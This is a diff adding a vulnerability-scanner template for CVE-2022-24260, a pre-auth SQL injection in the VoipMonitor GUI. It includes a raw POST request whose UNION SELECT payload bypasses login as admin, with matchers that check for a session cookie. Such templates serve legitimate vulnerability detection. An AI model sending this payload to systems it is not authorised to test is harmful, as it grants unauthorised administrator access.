diff --git a/cves/2022/CVE-2022-24260.yaml b/cves/2022/CVE-2022-24260.yaml new file mode 100644 index 0000000000..c6366e47ea --- /dev/null +++ b/cves/2022/CVE-2022-24260.yaml @@ -0,0 +1,38 @@ +id: CVE-2022-24260 + +info: + name: VoipMonitor - Pre-Auth SQL injection + author: gy741 + severity: critical + description: A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level. + reference: + - https://kerbit.io/research/read/blog/3 + - https://nvd.nist.gov/vuln/detail/CVE-2022-24260 + - https://www.voipmonitor.org/changelog-gui?major=5 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 9.80 + cve-id: CVE-2022-24260 + cwe-id: CWE-89 + tags: cve,cve2022,voipmonitor,sqli,unauth + +requests: + - raw: + - | + POST /api.php HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + + module=relogin&action=login&pass=nope&user=a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; # + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "Set-Cookie: PHPSESSID" + + - type: status + status: + - 200